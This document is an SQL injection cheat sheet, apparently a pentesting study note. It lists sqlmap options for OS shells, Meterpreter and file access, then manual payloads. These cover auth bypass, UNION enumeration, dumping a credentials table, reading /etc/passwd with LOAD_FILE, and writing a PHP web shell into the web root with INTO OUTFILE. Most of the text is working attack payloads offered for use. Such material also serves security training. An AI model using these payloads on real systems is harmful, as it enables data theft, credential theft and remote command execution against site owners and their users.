SQLMAP
# Load the target HTTP request from a file
-r
# Try to pop a shell
--os-shell
# Injecting a Meterpreter shell or VNC
--os-pwn
# Run operating system level commands
--os-cmd=OSCMD
# One click prompt for an OOB shell, meterpreter or VNC
--os-smbrelay
# Stored procedure buffer overflow exploitation
--os-bof
# Database process user privilege escalation
--priv-esc
# Local path where Metasploit Framework 3 is installed
--msf-path=MSFPATH
#File reading and Writing
# Read a file from the back-end DBMS file system
--file-read=RFILE
#Write a local file on the back-end DBMS file system
--file-write=WFILE
#Back-end DBMS absolute filepath to write to
--file-dest=DFILE
# Windows Registry Access: these options access the Windows registry of the back-end database management system.
# Read a Windows registry key value
--reg-read
# Write a Windows registry key value data
--reg-add
# Delete a Windows registry key value
--reg-del
# Windows registry key
--reg-key=REGKEY
# Windows registry key value
--reg-value=REGVAL
# Windows registry key value data
--reg-data=REGDATA
#Windows registry key value type
--reg-type=REGTYPE
--technique=
# Examples
B: Boolean-based blind # AND 1=1
E: Error-based # AND GTID_SUBSET(@@version,0)
U: Union query-based # UNION ALL SELECT 1,@@version,3
S: Stacked queries # ; DROP TABLE users
T: Time-based blind # AND 1=IF(2>1,SLEEP(5),0)
Q: Inline queries # SELECT (SELECT @@version) from
# Crawl the target website to discover parameters automatically
--crawl
# Redirect traffic through burp to see all requests
--proxy
--proxy="socks4://177.39.187.70:33283"
# Provide Proxy file
--proxy-file
# Check/use Tor
--check-tor
--tor
# Banner Grab
--banner
# Current user Grab
--current-user
# Grab Password Hashes
--passwords
# Checking if the current user has DBA (administrator) rights.
--is-dba
# Attempt to read a file from the back-end file system
--file-read "/etc/passwd"
# File write (shell.php) to /var/www/
--file-write "shell.php" --file-dest "/var/www/html/shell.php"
# Complete overview of the database architecture
--schema
# Search table/column names in large databases
Example: search for a table whose name contains 'user'
--search -T user
Example: search for a column whose name contains 'pass'
--search -C pass
# Tamper Scripts (Example)
--tamper=between,randomcase
--list-tampers
Basic SQL Commands
Login
mysql -u root -h <IP/HOST> -P <PORT> -p
SQLi Discovery
Payload URL Encoded
' %27
" %22
# %23
; %3B
) %29
Example SQLi Discovery
admin' OR '1'='1
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
If username is admin
OR
'1'='1' always evaluates to true, so this branch is always satisfied
AND
If password is something
Comment Types
--
# Sometimes needs to be url encoded '%23'
/**/ inline comment
Auth Bypass with comments
admin'--
SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';
Sometimes the query wraps the condition in parentheses. This payload selects the row with id = 5, closes the parenthesis, and comments out the remainder of the query.
' or id = 5 )#
SELECT * FROM logins WHERE (username='' or id = 5)#' AND id > 1) AND password = 'd41d8cd98f00b204e9800998ecf8427e';
Union Injections
Keep incrementing until you receive an error; if it fails at 5, the query has 4 columns.
' order by 1-- -
' order by 2-- -
' order by 3-- -
' order by 4-- -
# Receives error
' order by 5-- -
Using the above example, the first query errors because the original query has 4 columns, not 3.
#Bad
aa' UNION select 1,2,3-- -
#Fix
aa' UNION select 1,2,3,4-- -
Get the DBMS version
aa' UNION select 1,@@version,3,4-- -
Database Enumeration
| Payload | When to use | Expected output | Wrong output |
|---|---|---|---|
| `SELECT @@version` | When we have full query output | MySQL version, e.g. `10.3.22-MariaDB-1ubuntu1` | In MSSQL it returns the MSSQL version; error with other DBMS |
| `SELECT POW(1,1)` | When we only have numeric output | `1` | Error with other DBMS |
| `SELECT SLEEP(5)` | Blind / no output | Delays the page response for 5 seconds and returns 0 | Will not delay the response with other DBMS |
List Databases
# local database
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
# Injection
aa' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
What database is currently in use
aa' UNION select 1,database(),3,4-- -
# user() is another function that returns the current database user.
Replace columns 2 and 3 to list the tables of the database 'dev'
aa' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Dump the column names of the 'credentials' table
aa' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Now that we have the column names, dump the usernames and passwords
aa' UNION select 1, username, password, 4 from dev.credentials-- -
Reading Files
db user
#Find current user
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
aa' UNION SELECT 1, user(), 3, 4-- -
#or
aa' UNION SELECT 1, user, 3, 4 from mysql.user-- -
Check User privileges
SELECT super_priv FROM mysql.user
aa' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
aa' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
#Dump other privs (note: information_schema.user_privileges has no `user` column, only GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE, so the `WHERE user="root"` filter below will error; filter on grantee instead)
aa' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
aa' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE user="root"-- -
Load File
SELECT LOAD_FILE('/etc/passwd');
aa' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
#View the page source (Ctrl+U) to read the returned file contents
aa' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
Writing Files
The secure_file_priv variable controls where MySQL is allowed to read/write files. Empty = entire file system; a directory = only that directory; NULL = file read/write disabled entirely (the hardened setting).
SHOW VARIABLES LIKE 'secure_file_priv';
#Above command in SELECT form (information_schema.global_variables exists in MariaDB and MySQL < 5.7; newer MySQL moved it to performance_schema.global_variables)
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
#Union injection command
aa' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Writing data
#Copy all rows of users into /tmp/credentials
SELECT * from users INTO OUTFILE '/tmp/credentials';
#writing into /tmp/test.txt
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
#Writing into /www/html/
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
aa' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
Writing a Web Shell
<?php system($_REQUEST[0]); ?>
#Visit /shell.php then input command. Example (/shell.php?0=id)
aa' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
#or
aa' union select "",'<?php system("whoami"); ?>', "", "" into outfile '/var/www/html/shell.php'-- -